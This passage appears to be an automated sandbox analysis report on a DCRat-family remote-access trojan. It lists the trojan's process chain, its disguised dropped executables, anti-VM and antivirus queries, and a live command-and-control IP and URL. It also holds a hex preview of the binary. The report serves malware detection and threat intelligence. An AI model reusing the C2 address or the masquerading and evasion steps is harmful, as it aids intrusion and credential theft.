                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: 85D5ktqjpd.exe, XWWZQvSvBozA.exe.0.dr, XWWZQvSvBozA.exe0.0.dr, upfc.exe.0.dr, WmiPrvSE.exe.0.dr, ctfmon.exe.0.drBinary or memory string: NbhgFS3MdB
                            Source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA63558 rdtsc 0_2_00007FFD9BA63558
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Users\user\Desktop\85D5ktqjpd.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 85D5ktqjpd.exe PID: 6944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3384, type: MEMORYSTR
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara matchFile source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 85D5ktqjpd.exe PID: 6944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3384, type: MEMORYSTR
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts141
                            Windows Management Instrumentation
                            1
                            Scripting
                            11
                            Process Injection
                            113
                            Masquerading
                            OS Credential Dumping251
                            Security Software Discovery
                            Remote Services1
                            Archive Collected Data
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Disable or Modify Tools
                            LSASS Memory1
                            Process Discovery
                            Remote Desktop ProtocolData from Removable Media2
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                            Virtualization/Sandbox Evasion
                            Security Account Manager151
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection
                            NTDS1
                            Remote System Discovery
                            Distributed Component Object ModelInput Capture12
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                            Obfuscated Files or Information
                            LSA Secrets1
                            System Network Configuration Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading
                            Cached Domain Credentials2
                            File and Directory Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
                            System Information Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph ID: 1589407 | Sample: 85D5ktqjpd.exe | Startdate: 12/01/2025 | Architecture: WINDOWS | Score: 100

Signatures on the sample node: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 11 other signatures

85D5ktqjpd.exe (4, 48) started
    Dropped: C:\Users\user\Desktop\ypIvhwSa.log (PE32); C:\Users\user\Desktop\xJoFaSxi.log (PE32); C:\Users\user\Desktop\uzSEaASh.log (PE32); 35 other malicious files
    Signatures: Drops executable to a common third party application directory
    cmd.exe (1) started
        Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
        ctfmon.exe (15, 29) started
            DNS/IP: 91.211.249.46, ports 49731, 80, ON-LINE-DATAServerlocation-NetherlandsDrontenNL, Ukraine
            Dropped: C:\Users\user\Desktop\zTtncajv.log (PE32); C:\Users\user\Desktop\yWRfHaUA.log (PE32); C:\Users\user\Desktop\yOiNcrtu.log (PE32); 24 other malicious files
            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file
        conhost.exe started
        PING.EXE (1) started
        chcp.com (1) started

Source | Detection | Scanner | Label
85D5ktqjpd.exe | 62% | Virustotal |
85D5ktqjpd.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
85D5ktqjpd.exe | 100% | Avira | HEUR/AGEN.1339906
85D5ktqjpd.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\Desktop\QitkawpP.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\Desktop\HpjdguSK.log | 100% | Avira | HEUR/AGEN.1362695
C:\Recovery\ctfmon.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\Desktop\VWLjDtED.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\MdBcJrhy.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\TEXjXBsl.log | 100% | Joe Sandbox ML |
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\VOtkXUXl.log | 100% | Joe Sandbox ML |
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | 100% | Joe Sandbox ML |
C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\LnsTTQzV.log | 100% | Joe Sandbox ML |
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CJjejXjo.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\HpjdguSK.log | 100% | Joe Sandbox ML |
C:\Recovery\ctfmon.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\HFlvrDZi.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\VWLjDtED.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\ICMDMDoc.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\MdBcJrhy.log | 100% | Joe Sandbox ML |
C:\Program Files\Mozilla Firefox\uninstall\upfc.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\ctfmon.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CJjejXjo.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\Cbqwysdq.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\CpWmZfmQ.log | 29% | ReversingLabs |
C:\Users\user\Desktop\EzsmZyRR.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\FMWMFGoj.log | 8% | ReversingLabs |
C:\Users\user\Desktop\FfNcgcmK.log | 8% | ReversingLabs |
C:\Users\user\Desktop\HFlvrDZi.log | 8% | ReversingLabs |
C:\Users\user\Desktop\HpjdguSK.log | 17% | ReversingLabs |
C:\Users\user\Desktop\ICMDMDoc.log | 21% | ReversingLabs |
C:\Users\user\Desktop\JVDTnZnD.log | 25% | ReversingLabs |
C:\Users\user\Desktop\LEzlimtY.log | 17% | ReversingLabs |
C:\Users\user\Desktop\LnsTTQzV.log | 9% | ReversingLabs |
C:\Users\user\Desktop\MdBcJrhy.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NLuKuVnw.log | 9% | ReversingLabs |
C:\Users\user\Desktop\QitkawpP.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RYCtQXXs.log | 6% | ReversingLabs |
C:\Users\user\Desktop\TEXjXBsl.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\VOtkXUXl.log | 9% | ReversingLabs |
C:\Users\user\Desktop\VWLjDtED.log | 17% | ReversingLabs |
C:\Users\user\Desktop\WLUssUmg.log | 8% | ReversingLabs |
C:\Users\user\Desktop\WbWKDcuD.log | 4% | ReversingLabs |
C:\Users\user\Desktop\WuNaeyse.log | 25% | ReversingLabs |
C:\Users\user\Desktop\XYySZcJy.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ZJdigpUr.log | 5% | ReversingLabs |
C:\Users\user\Desktop\ZRNAKZux.log | 12% | ReversingLabs |
C:\Users\user\Desktop\akEQlvtX.log | 16% | ReversingLabs |
C:\Users\user\Desktop\cExRVzrV.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\cLPQBZYm.log | 29% | ReversingLabs |
C:\Users\user\Desktop\dzUZnmUk.log | 3% | ReversingLabs |
C:\Users\user\Desktop\eWmRCrDn.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\fKqanEzl.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\gdhqOayL.log | 8% | ReversingLabs |
C:\Users\user\Desktop\haIyjaMG.log | 21% | ReversingLabs |
C:\Users\user\Desktop\hyuiZSvj.log | 21% | ReversingLabs |
C:\Users\user\Desktop\iMcIJnEg.log | 8% | ReversingLabs |
C:\Users\user\Desktop\jAgQuBAe.log | 16% | ReversingLabs |
C:\Users\user\Desktop\jswyQSZZ.log | 25% | ReversingLabs |
C:\Users\user\Desktop\kiFHFtHC.log | 17% | ReversingLabs |
C:\Users\user\Desktop\lQyoqXNz.log | 17% | ReversingLabs |
C:\Users\user\Desktop\nbVprpsA.log | 4% | ReversingLabs |
C:\Users\user\Desktop\oPZxcDoy.log | 25% | ReversingLabs |
C:\Users\user\Desktop\oYwxMpHv.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\pHpfyUNt.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\psJpXhFT.log | 9% | ReversingLabs |
C:\Users\user\Desktop\rIogOAZx.log | 21% | ReversingLabs |
C:\Users\user\Desktop\sdoGeuPL.log | 25% | ReversingLabs |
C:\Users\user\Desktop\tTxOTVxp.log | 5% | ReversingLabs |
C:\Users\user\Desktop\uzSEaASh.log | 3% | ReversingLabs |
C:\Users\user\Desktop\vdCwVejC.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\xJoFaSxi.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\yOiNcrtu.log | 17% | ReversingLabs |
C:\Users\user\Desktop\yWRfHaUA.log | 25% | ReversingLabs |
C:\Users\user\Desktop\ypIvhwSa.log | 12% | ReversingLabs |
C:\Users\user\Desktop\zTtncajv.log | 6% | ReversingLabs |
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label
http://91.211.249.46 | 0% | Avira URL Cloud | safe
http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php | 0% | Avira URL Cloud | safe
http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ | 0% | Avira URL Cloud | safe
                            No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php | true | Avira URL Cloud: safe | unknown
                            Name | Source | Malicious | Antivirus Detection | Reputation
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ | ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.0000000003571000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            http://91.211.249.46 | ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                              IP | Domain | Country | ASN | ASN Name | Malicious
                              91.211.249.46 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1589407
                              Start date and time:2025-01-12 09:16:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:85D5ktqjpd.exe
                              renamed because original name is a hash value
                              Original Sample Name:97c2927135dd8fce7d56d5e1b2914bfa.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@10/73@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              No simulations
                              No context
                              No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              ON-LINE-DATAServerlocation-NetherlandsDrontenNL | gYjK72gL17.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.231.69.191
                              | 1lhZVZx5nD.exe | Get hash | malicious | Stealc, Vidar | Browse | 91.211.250.247
                              | FnTSHWLNWB.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.219.81.132
                              | arm.elf | Get hash | malicious | Mirai | Browse | 185.235.146.207
                              | 2BI8rJKpBa.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.219.81.132
                              | 2AIgdyA1Cl.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.219.81.132
                              | 1So9BcQi1J.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.219.81.135
                              | ZXVcgrmGRM.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.219.81.135
                              | 6aTAU3Dzp6.exe | Get hash | malicious | Stealc, Vidar | Browse | 92.119.114.51
                              | hD7SED8r8Q.exe | Get hash | malicious | Stealc, Vidar | Browse | 45.91.201.185
                              No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              C:\Users\user\Desktop\CJjejXjo.log | OisrvsB6Ea.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | 3XtEci4Mmo.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse |
                              | 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | aW6kSsgdvv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | HMhdtzxEHf.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | kJrNOFEGbQ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | lEwK4xROgV.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                              | zZ1Y43bxxV.exe | Get hash | malicious | DCRat | Browse |
                              | VqGD18ELBM.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (377), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):377
                                                  Entropy (8bit):5.850339764270371
                                                  Encrypted:false
                                                  SSDEEP:6:Dbn27hiRXXBXF00Q0KfQCi0Wz4bMkshUirZuYt6IsweswHNd84R2JoslIjUUd3V5:Dbnahg0Ml0fAUirQS4weLX802JcF5
                                                  MD5:4F1FE7065279D304E9F0CA964D50C183
                                                  SHA1:9E68E92AD4EC5CD19ABB71169285B132F744934D
                                                  SHA-256:24C590FC932AD14E064763EE376686313C0C6C4AB276941358A65000DCE56BB6
                                                  SHA-512:6B537202793249B039A0488584E66A8304469FD8DCDEC82AD4ADB1004F74A2BE129AC6BC0E236D5AF359A31F8DFDBB9BC50560AFD6EE1B11939CBA90F495DEB1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:jZqJa1jh9TXBt8GdpEcVGWzK6MFEu0pqVYQCHaKiYtW4rVGFQzWR4iQNkfMNwfwIorqVrDWO347WA4dlFAx5eXvwHDcmO7v26NQAovXMdHYAl4MpClHwr1oQ54OoluA5IEawnc6UmlbW9uKM0wjnz9LEjAFugtltHc2heaCjowKGaRQKtBxzKWGI3VNnXMy2AsPg2nsauA8CzEoRt4Ae6viuWtoINYMc8RGrCtSGTXFJXDTyq53dLT6OJeKJ8jNVxgEh87P9m3LiqZWTZ0cRetRpV1hhjIItKtW19vztq30RIXhuH1tIH50EPYMGZradvbY7CfToAslk29g7TwarZ9mO2RmkisT8dXfq8krmhFIYUQLP2PwnRsEwz
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (484), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):484
                                                  Entropy (8bit):5.803141929256237
                                                  Encrypted:false
                                                  SSDEEP:12:bUqhkmtA5QWkC+33YZzALYaI14KMfZOVy4iTV4:bumC5QWkCO4ZAZOV04
                                                  MD5:D0F541A7B43587EDB270D3DEAC5D14DB
                                                  SHA1:8F07C4BF623B582E33CCB0FB03BE96AED11FC173
                                                  SHA-256:1461344A4A17F9FFA06B3E9C1EBF6E719597202161222546C06ABD2B5672079A
